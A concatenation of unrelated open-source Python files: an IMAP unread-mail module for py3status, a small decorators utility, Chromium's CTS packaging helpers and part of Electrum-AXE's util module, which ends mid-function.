# RFC 2177 (https://tools.ietf.org/html/rfc2177) only requires the "+" character.
if not response.lower().startswith("+"):
raise imaplib.IMAP4.abort(
"While initializing IDLE: {}".format(response)
)
# wait for changes (EXISTS, EXPUNGE, etc.):
socket.settimeout(self.cache_timeout)
while True:
try:
response = socket.read(4096).decode("ascii")
if response.upper().startswith("* OK"):
continue # ignore '* OK Still here'
else:
break
except socket_error: # IDLE timed out
break
finally: # terminate IDLE command gracefully
if socket is None:
return
socket.settimeout(self.read_timeout)
socket.write(b"DONE\r\n") # important! Can't query IMAP again otherwise
try:
response = socket.read(4096).decode("ascii")
except socket_error:
raise imaplib.IMAP4.abort("Server didn't respond to 'DONE' in time")
# sometimes, more messages come in between reading and DONEing; so read them again:
if response.startswith("* "):
try:
response = socket.read(4096).decode("ascii")
except socket_error:
raise imaplib.IMAP4.abort(
"Server sent more continuations, but no 'DONE' ack"
)
expected_response = (command_tag + b" OK").decode("ascii")
if not response.lower().startswith(expected_response.lower()):
raise imaplib.IMAP4.abort("While terminating IDLE: " + response)
def _get_mail_count(self):
retry_counter = 0
retry_max = 3
while True:
try:
if self.connection is None:
self._connect()
if self.connection.state == "NONAUTH":
if self.client_secret:
# Authenticate using OAUTH
auth_string = "user={}\1auth=Bearer {}\1\1".format(
self.user, self.creds.token
)
self.connection.authenticate("XOAUTH2", lambda x: auth_string)
else:
# Login with user and password
self.connection.login(self.user, self.password)
tmp_mail_count = 0
directories = self.mailbox.split(",")
for directory in directories:
self.connection.select(directory)
unseen_response = self.connection.search(None, self.criterion)
mails = unseen_response[1][0].split()
tmp_mail_count += len(mails)
self.mail_count = tmp_mail_count
self.network_error = None
if self.use_idle:
self.py3.update()
self._idle()
retry_counter = 0
else:
return
except (socket_error, imaplib.IMAP4.abort, imaplib.IMAP4.readonly) as e:
if "didn't respond to 'DONE'" in str(e) or isinstance(e, socket_error):
self.network_error = str(e)
error_type = "Network"
else:
error_type = "Recoverable"
# Note: we don't reset network_error, as we want this to persist
# until we either run into a permanent error or successfully receive
# another response from the IMAP server.
if self.debug:
self.py3.log(
"{} error - {}".format(error_type, e),
level=self.py3.LOG_WARNING,
)
self._disconnect()
retry_counter += 1
if retry_counter <= retry_max:
if self.debug:
self.py3.log(
"Retrying ({}/{})".format(retry_counter, retry_max),
level=self.py3.LOG_INFO,
)
continue
break
except (imaplib.IMAP4.error, Exception) as e:
self.mail_error = "Fatal error - {}".format(e)
self._disconnect()
self.mail_count = None
retry_counter += 1
if retry_counter <= retry_max:
if self.debug:
self.py3.log(
"Will retry after 60 seconds ({}/{})".format(
retry_counter, retry_max
),
level=self.py3.LOG_INFO,
)
sleep(60)
continue
break
finally:
self.py3.update() # to propagate mail_error
if __name__ == "__main__":
"""
Run module in test mode.
"""
from py3status.module_test import module_test
module_test(Py3status)
|
decorator.py
|
"""Decorators"""
import sys
import time
import traceback
from functools import wraps
from threading import Thread
__all__ = list(globals())
def main(f):
if len(sys.argv) == 1:
f()
for v in sys.argv[1:]:
f(v)
return f
def timeit(f):
@wraps(f)
def wrapper(*args, **kwargs):
s = time.time()
ret = f(*args, **kwargs)
e = time.time()
print('Running <%s>: %.4f' % (f.__name__, e - s))
return ret
return wrapper
def tracer(f):
@wraps(f)
def wrapper(*args, **kwargs):
print('Enter function:', f.__name__)
if args:
print('args:', args)
if kwargs:
print('kwargs:', kwargs)
s = time.time()
ret = f(*args, **kwargs)
e = time.time()
print('Leave function:', e - s)
return ret
return wrapper
def protect(f):
@wraps(f)
def wrapper(*args, **kwargs):
try:
return f(*args, **kwargs)
except Exception as e:
msg = traceback.format_exc()
print(msg, file=sys.stderr)
return msg
return wrapper
def surround(before=(), after=()):
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
# print(func.__name__) # for test
[f() for f in before]
ret = func(*args, **kwargs)
[f() for f in after]
return ret
return wrapper
return decorator
def hotkey(key='F12'):
key = key.lower()
def decorator(f):
def press(key2):
if key == str(key2).split('.')[-1].lower():
f()
def th():
import pynput
with pynput.keyboard.Listener(press) as kl:
kl.join()
Thread(target=th).start()
return f
return decorator
__all__ = [k for k in globals() if k not in __all__]
|
cts_utils.py
|
# Copyright 2020 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Stage the Chromium checkout to update CTS test version."""
import contextlib
import json
import operator
import os
import re
import six
import sys
import tempfile
import threading
import urllib
import zipfile
sys.path.append(
os.path.join(
os.path.dirname(__file__), os.pardir, os.pardir, 'third_party',
'catapult', 'devil'))
from devil.utils import cmd_helper
sys.path.append(
os.path.join(
os.path.dirname(__file__), os.pardir, os.pardir, 'third_party',
'catapult', 'common', 'py_utils'))
from py_utils import tempfile_ext
SRC_DIR = os.path.abspath(
os.path.join(os.path.dirname(__file__), os.pardir, os.pardir))
TOOLS_DIR = os.path.join('android_webview', 'tools')
CONFIG_FILE = os.path.join('cts_config', 'webview_cts_gcs_path.json')
CONFIG_PATH = os.path.join(SRC_DIR, TOOLS_DIR, CONFIG_FILE)
CIPD_FILE = os.path.join('cts_archive', 'cipd.yaml')
CIPD_PATH = os.path.join(SRC_DIR, TOOLS_DIR, CIPD_FILE)
DEPS_FILE = 'DEPS'
TEST_SUITES_FILE = os.path.join('testing', 'buildbot', 'test_suites.pyl')
# Android desserts that are no longer receiving CTS updates at
# https://source.android.com/compatibility/cts/downloads
# Please update this list as more versions reach end-of-service.
END_OF_SERVICE_DESSERTS = ['M']
CTS_DEP_NAME = 'src/android_webview/tools/cts_archive'
CTS_DEP_PACKAGE = 'chromium/android_webview/tools/cts_archive'
CIPD_REFERRERS = [DEPS_FILE, TEST_SUITES_FILE]
_GENERATE_BUILDBOT_JSON = os.path.join('testing', 'buildbot',
'generate_buildbot_json.py')
_ENSURE_FORMAT = """$ParanoidMode CheckIntegrity
@Subdir cipd
{} {}"""
_ENSURE_SUBDIR = 'cipd'
_RE_COMMENT_OR_BLANK = re.compile(r'^ *(#.*)?$')
class CTSConfig(object):
"""Represents a CTS config file."""
def __init__(self, file_path=CONFIG_PATH):
"""Constructs a representation of the CTS config file.
Only read operations are provided by this object. Users should edit the
file manually for any modifications.
Args:
file_path: Path to file.
"""
self._path = os.path.abspath(file_path)
with open(self._path) as f:
self._config = json.load(f)
def get_platforms(self):
return sorted(self._config.keys())
def get_archs(self, platform):
return sorted(self._config[platform]['arch'].keys())
def iter_platform_archs(self):
for p in self.get_platforms():
for a in self.get_archs(p):
yield p, a
def get_cipd_zip(self, platform, arch):
return self._config[platform]['arch'][arch]['filename']
def get_origin(self, platform, arch):
return self._config[platform]['arch'][arch]['_origin']
def get_origin_zip(self, platform, arch):
return os.path.basename(self.get_origin(platform, arch))
def get_apks(self, platform):
return sorted([r['apk'] for r in self._config[platform]['test_runs']])
class CTSCIPDYaml(object):
"""Represents a CTS CIPD yaml file."""
RE_PACKAGE = r'^package:\s*(\S+)\s*$'
RE_DESC = r'^description:\s*(.+)$'
RE_DATA = r'^data:\s*$'
RE_FILE = r'^\s+-\s+file:\s*(.+)$'
# TODO(crbug.com/1049432): Replace with yaml parser
@classmethod
def parse(cls, lines):
result = {}
for line in lines:
if len(line) == 0 or line[0] == '#':
continue
package_match = re.match(cls.RE_PACKAGE, line)
if package_match:
result['package'] = package_match.group(1)
continue
desc_match = re.match(cls.RE_DESC, line)
if desc_match:
result['description'] = desc_match.group(1)
continue
if re.match(cls.RE_DATA, line):
result['data'] = []
if 'data' in result:
file_match = re.match(cls.RE_FILE, line)
if file_match:
result['data'].append({'file': file_match.group(1)})
return result
def __init__(self, file_path=CIPD_PATH):
"""Constructs a representation of CTS CIPD yaml file.
Note the file won't be modified unless write is called
with its path.
Args:
file_path: Path to file.
"""
self._path = os.path.abspath(file_path)
self._header = []
# Read header comments
with open(self._path) as f:
for l in f.readlines():
if re.match(_RE_COMMENT_OR_BLANK, l):
self._header.append(l)
else:
break
# Read yaml data
with open(self._path) as f:
self._yaml = CTSCIPDYaml.parse(f.readlines())
def get_file_path(self):
"""Get full file path of yaml file that this was constructed from."""
return self._path
def get_file_basename(self):
"""Get base file name that this was constructed from."""
return os.path.basename(self._path)
def get_package(self):
"""Get package name."""
return self._yaml['package']
def clear_files(self):
"""Clears all files in file (only in local memory, does not modify file)."""
self._yaml['data'] = []
def append_file(self, file_name):
"""Add file_name to list of files."""
self._yaml['data'].append({'file': str(file_name)})
def remove_file(self, file_name):
"""Remove file_name from list of files."""
old_file_names = self.get_files()
new_file_names = [name for name in old_file_names if name != file_name]
self._yaml['data'] = [{'file': name} for name in new_file_names]
def get_files(self):
"""Get list of files in yaml file."""
return [e['file'] for e in self._yaml['data']]
def write(self, file_path):
"""(Over)write file_path with the cipd.yaml representation."""
dir_name = os.path.dirname(file_path)
if not os.path.isdir(dir_name):
os.makedirs(dir_name)
with open(file_path, 'w') as f:
f.writelines(self._get_yamls())
def _get_yamls(self):
"""Return the cipd.yaml file contents of this object."""
output = []
output += self._header
output.append('package: {}\n'.format(self._yaml['package']))
output.append('description: {}\n'.format(self._yaml['description']))
output.append('data:\n')
for d in sorted(self._yaml['data'], key=operator.itemgetter('file')):
output.append(' - file: {}\n'.format(d.get('file')))
return output
def cipd_ensure(package, version, root_dir):
"""Ensures CIPD package is installed at root_dir.
Args:
package: CIPD name of package
version: Package version
root_dir: Directory to install package into
"""
def _createEnsureFile(package, version, file_path):
with open(file_path, 'w') as f:
f.write(_ENSURE_FORMAT.format(package, version))
def _ensure(root, ensure_file):
ret = cmd_helper.RunCmd(
['cipd', 'ensure', '-root', root, '-ensure-file', ensure_file])
if ret:
raise IOError('Error while running cipd ensure: ' + ret)
with tempfile.NamedTemporaryFile() as f:
_createEnsureFile(package, version, f.name)
_ensure(root_dir, f.name)
def cipd_download(cipd, version, download_dir):
"""Downloads CIPD package files.
This is different from cipd ensure in that actual files will exist at
download_dir instead of symlinks.
Args:
cipd: CTSCIPDYaml object
version: Version of package
download_dir: Destination directory
"""
package = cipd.get_package()
download_dir_abs = os.path.abspath(download_dir)
if not os.path.isdir(download_dir_abs):
os.makedirs(download_dir_abs)
with tempfile_ext.NamedTemporaryDirectory() as workDir, chdir(workDir):
cipd_ensure(package, version, '.')
for file_name in cipd.get_files():
src_path = os.path.join(_ENSURE_SUBDIR, file_name)
dest_path = os.path.join(download_dir_abs, file_name)
dest_dir = os.path.dirname(dest_path)
if not os.path.isdir(dest_dir):
os.makedirs(dest_dir)
ret = cmd_helper.RunCmd(['cp', '--reflink=never', src_path, dest_path])
if ret:
raise IOError('Error file copy from ' + file_name + ' to ' + dest_path)
def filter_cts_file(cts_config, cts_zip_file, dest_dir):
"""Filters out non-webview test apks from downloaded CTS zip file.
Args:
cts_config: CTSConfig object
cts_zip_file: Path to downloaded CTS zip, retaining the original filename
dest_dir: Destination directory to filter to, filename will be unchanged
"""
for p in cts_config.get_platforms():
for a in cts_config.get_archs(p):
o = cts_config.get_origin(p, a)
base_name = os.path.basename(o)
if base_name == os.path.basename(cts_zip_file):
filterzip(cts_zip_file, cts_config.get_apks(p),
os.path.join(dest_dir, base_name))
return
raise ValueError('Could not find platform and arch for: ' + cts_zip_file)
class ChromiumRepoHelper(object):
"""Performs operations on Chromium checkout."""
def __init__(self, root_dir=SRC_DIR):
self._root_dir = os.path.abspath(root_dir)
self._cipd_referrers = [
os.path.join(self._root_dir, p) for p in CIPD_REFERRERS
]
@property
def cipd_referrers(self):
return self._cipd_referrers
@property
def cts_cipd_package(self):
return CTS_DEP_PACKAGE
def get_cipd_dependency_rev(self):
"""Return CTS CIPD revision in the checkout's DEPS file."""
deps_file = os.path.join(self._root_dir, DEPS_FILE)
# Use the gclient command instead of gclient_eval since the latter is not
# intended for direct use outside of depot_tools.
cmd = [
'gclient', 'getdep', '--revision',
'%s:%s' % (CTS_DEP_NAME, CTS_DEP_PACKAGE), '--deps-file', deps_file
]
env = os.environ
# Disable auto-update of depot tools since update_depot_tools may not be
# available (for example, on the presubmit bot), and it's probably best not
# to perform surprise updates anyways.
env.update({'DEPOT_TOOLS_UPDATE': '0'})
status, output, err = cmd_helper.GetCmdStatusOutputAndError(cmd, env=env)
if status != 0:
raise Exception('Command "%s" failed: %s' % (' '.join(cmd), err))
return output.strip()
def update_cts_cipd_rev(self, new_version):
"""Update references to CTS CIPD revision in checkout.
Args:
new_version: New version to use
"""
old_version = self.get_cipd_dependency_rev()
for path in self.cipd_referrers:
replace_cipd_revision(path, old_version, new_version)
def git_status(self, path):
"""Returns canonical git status of file.
Args:
path: Path to file.
Returns:
Output of git status --porcelain.
"""
with chdir(self._root_dir):
output = cmd_helper.GetCmdOutput(['git', 'status', '--porcelain', path])
return output
def update_testing_json(self):
"""Performs generate_buildbot_json.py.
Raises:
IOError: If generation failed.
"""
with chdir(self._root_dir):
ret = cmd_helper.RunCmd(['python', _GENERATE_BUILDBOT_JSON])
if ret:
raise IOError('Error while generating_buildbot_json.py')
def rebase(self, *rel_path_parts):
"""Construct absolute path from parts relative to root_dir.
Args:
rel_path_parts: Parts of the root relative path.
Returns:
The absolute path.
"""
return os.path.join(self._root_dir, *rel_path_parts)
def replace_cipd_revision(file_path, old_revision, new_revision):
"""Replaces cipd revision strings in file.
Args:
file_path: Path to file.
old_revision: Old cipd revision to be replaced.
new_revision: New cipd revision to use as replacement.
Returns:
Number of replaced occurrences.
Raises:
IOError: If no occurrences were found.
"""
with open(file_path) as f:
contents = f.read()
num = contents.count(old_revision)
if not num:
raise IOError('Did not find old CIPD revision {} in {}'.format(
old_revision, file_path))
newcontents = contents.replace(old_revision, new_revision)
with open(file_path, 'w') as f:
f.write(newcontents)
return num
@contextlib.contextmanager
def chdir(dirPath):
"""Context manager that changes working directory."""
cwd = os.getcwd()
os.chdir(dirPath)
try:
yield
finally:
os.chdir(cwd)
def filterzip(inputPath, pathList, outputPath):
"""Copy a subset of files from input archive into output archive.
Args:
inputPath: Input archive path
pathList: List of file names from input archive to copy
outputPath: Output archive path
"""
with zipfile.ZipFile(os.path.abspath(inputPath), 'r') as inputZip,\
zipfile.ZipFile(os.path.abspath(outputPath), 'w') as outputZip,\
tempfile_ext.NamedTemporaryDirectory() as workDir,\
chdir(workDir):
for p in pathList:
inputZip.extract(p)
outputZip.write(p)
def download(url, destination):
"""Asynchronously download url to path specified by destination.
Args:
url: Url location of file.
destination: Path where file should be saved to.
If destination parent directories do not exist, they will be created.
Returns the download thread which can then be joined by the caller to
wait for download completion.
"""
dest_dir = os.path.dirname(destination)
if not os.path.isdir(dest_dir):
os.makedirs(dest_dir)
if six.PY2:
retrieve_target = urllib.urlretrieve
else:
retrieve_target = urllib.request.urlretrieve
t = threading.Thread(target=retrieve_target, args=(url, destination))
t.start()
return t
def update_cipd_package(cipd_yaml_path):
"""Updates the CIPD package specified by cipd_yaml_path.
Args:
cipd_yaml_path: Path of cipd yaml specification file
"""
cipd_yaml_path_abs = os.path.abspath(cipd_yaml_path)
with chdir(os.path.dirname(cipd_yaml_path_abs)),\
tempfile.NamedTemporaryFile() as jsonOut:
ret = cmd_helper.RunCmd([
'cipd', 'create', '-pkg-def', cipd_yaml_path_abs, '-json-output',
jsonOut.name
])
if ret:
raise IOError('Error during cipd create.')
return json.load(jsonOut)['result']['instance_id']
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from typing import NamedTuple
from datetime import datetime
import decimal
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
import stat
import inspect
from locale import localeconv
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'AXE':8, 'mAXE':5, 'uAXE':2, 'haks':0}
base_units_inverse = inv_dict(base_units)
base_units_list = ['AXE', 'mAXE', 'uAXE', 'haks'] # list(dict) does not guarantee order
def decimal_point_to_base_unit_name(dp: int) -> str:
# e.g. 8 -> "AXE"
try:
return base_units_inverse[dp]
except KeyError:
raise Exception('Unknown base unit')
def base_unit_name_to_decimal_point(unit_name: str) -> int:
# e.g. "AXE" -> 8
try:
return base_units[unit_name]
except KeyError:
raise Exception('Unknown base unit')
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
# Raised when importing a key that's already in the wallet.
class AlreadyHaveAddress(Exception):
def __init__(self, msg, addr):
super(AlreadyHaveAddress, self).__init__(msg)
self.addr = addr
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class BitcoinException(Exception): pass
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Satoshis(object):
__slots__ = ('value',)
def __new__(cls, value):
self = super(Satoshis, cls).__new__(cls)
self.value = value
return self
def __repr__(self):
return 'Haks(%d)'%self.value
def __str__(self):
return format_satoshis(self.value) + " AXE"
class Fiat(object):
__slots__ = ('value', 'ccy')
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)'% self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, Satoshis):
return str(obj)
if isinstance(obj, Fiat):
return str(obj)
if isinstance(obj, Decimal):
return str(obj)
if isinstance(obj, datetime):
return obj.isoformat(' ')[:-3]
if isinstance(obj, set):
return list(obj)
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
verbosity_filter = ''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
if self.verbosity_filter in verbosity or verbosity == '*':
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
verbosity_filter = 'd'
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
verbosity = '*'
def set_verbosity(b):
global verbosity
verbosity = b
def print_error(*args):
if not verbosity: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def get_func_name(args):
arg_names_from_sig = inspect.getfullargspec(func).args
# prepend class name if there is one (and if we can find it)
if len(arg_names_from_sig) > 0 and len(args) > 0 \
and arg_names_from_sig[0] in ('self', 'cls', 'klass'):
classname = args[0].__class__.__name__
else:
classname = ''
name = '{}.{}'.format(classname, func.__name__) if classname else func.__name__
return name
def do_profile(args, kw_args):
name = get_func_name(args)
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", name, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.axe.electrum.electrum_axe'
if not os.path.exists(d):
try:
os.mkdir(d)
except FileExistsError:
pass # in case of race
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum-axe'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_datadir_available(config_path):
path = config_path
if os.path.exists(path):
return
else:
raise FileNotFoundError(
'Electrum-AXE datadir does not exist. Was it deleted while running?' + '\n' +
'Should be at {}'.format(path))
def assert_file_in_datadir_available(path, config_path):
if os.path.exists(path):
return
else:
assert_datadir_available(config_path)
raise FileNotFoundError(
'Cannot find file but datadir is there.' + '\n' +
'Should be at {}'.format(path))
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-axe")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-AXE")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-AXE")
else:
#raise Exception("No home directory found in environment variables.")
return
def is_valid_email(s):
regexp = r"[^@]+@[^@]+\.[^@]+"
return re.match(regexp, s) is not None
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
DECIMAL_POINT = localeconv()['decimal_point']
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
if x is None:
return 'unknown'
if precision is None:
precision = decimal_point
decimal_format = ".0" + str(precision) if precision > 0 else ""
if is_diff:
decimal_format = '+' + decimal_format
result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
integer_part, fract_part = result.split(".")
dp = DECIMAL_POINT
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
FEERATE_PRECISION = 0 # num fractional decimal places for haks/kB fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)
def format_fee_satoshis(fee, num_zeros=0):
return '%d' % round(fee)
def quantize_feerate(fee):
"""Strip sat/byte fee rate of excess precision."""
if fee is None:
return None
return Decimal(fee).quantize(_feerate_quanta, rounding=decimal.ROUND_HALF_DOWN)
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
return datetime.fromtimestamp(timestamp)
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'AXExplorer': ('http://207.246.65.114:3001/',
{'tx': 'tx/', 'addr': 'address/'}),
'system default': ('blockchain:/',
{'tx': 'tx/', 'addr': 'address/'}),
}
testnet_block_explorers = {
'AXExplorer': ('http://207.246.65.114:3002/',
{'tx': 'tx/', 'addr': 'address/'}),
'system default': ('blockchain:/',
{'tx': 'tx/', 'addr': 'address/'}),
}
def block_explorer_info():
from . import constants
return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'AXExplorer')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return ''.join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a AXE address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'axe':
raise Exception("Not a AXE URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
